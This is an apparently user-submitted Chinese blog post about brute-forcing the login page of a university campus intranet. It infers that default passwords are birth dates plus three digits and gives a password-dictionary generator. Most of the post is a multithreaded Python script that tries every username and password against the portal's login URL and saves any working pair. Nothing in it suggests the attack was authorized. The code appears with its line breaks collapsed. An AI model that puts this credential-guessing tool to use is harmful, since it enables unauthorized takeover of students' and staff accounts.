某高校校园内网登录页面爆破

登录页爆破

项目地址

某高校校园内网登录默认密码为身份证后八位的前七位
推断密码为生日加三位随机数，生成密码字典

f = open('password.txt', mode='a+')
for i in range(int(input()), int(input())):f.write('0' + str(i) + '\n')f.close

通过WireShark抓包发现页面通过get请求提交参数，编写爆破脚本

import json
import re
import threading
import time
import requestsfile1 = open('username.txt', mode='r', encoding='utf-8')
file2 = open('password.txt', mode='r', encoding='utf-8')def dump_username():dic_username = file1.readlines()for i in range(len(dic_username)):dic_username[i] = dic_username[i].strip('\n')return dic_usernamedef dump_password():dic_password = file2.readlines()for i in range(len(dic_password)):dic_password[i] = dic_password[i].strip('\n')return dic_passworddef brute(session, username: str, password: str):url = 'http://10.255.0.19/drcom/login?callback=dr1003&DDDDD=' + username + '&upass=' + password + '&0MKKey=123456&R1=0&R3=0&R6=0¶=00&v6ip=&v='headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0','Referer': 'http://10.255.0.19/a79.htm'}r = session.get(url=url, headers=headers, verify=False)print(str(r.status_code) + '\t' + str(len(r.text)) + '\t' +username + '\t' + password + '\t', end='\t')s = re.findall(r'\((.*?)\)', r.text)j = json.loads(s[0])status = j['result']print(status)if status == 1:with open('result.txt', mode='a+') as f:f.write(username + '\t' + password)if len(r.text) != 2930:exit(0)if __name__ == '__main__':dic_username = dump_username()dic_password = dump_password()session = requests.session()for username in dic_username:for password in dic_password:t = threading.Thread(target=brute, args=(session, username, password))t.start()time.sleep(0.005)

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！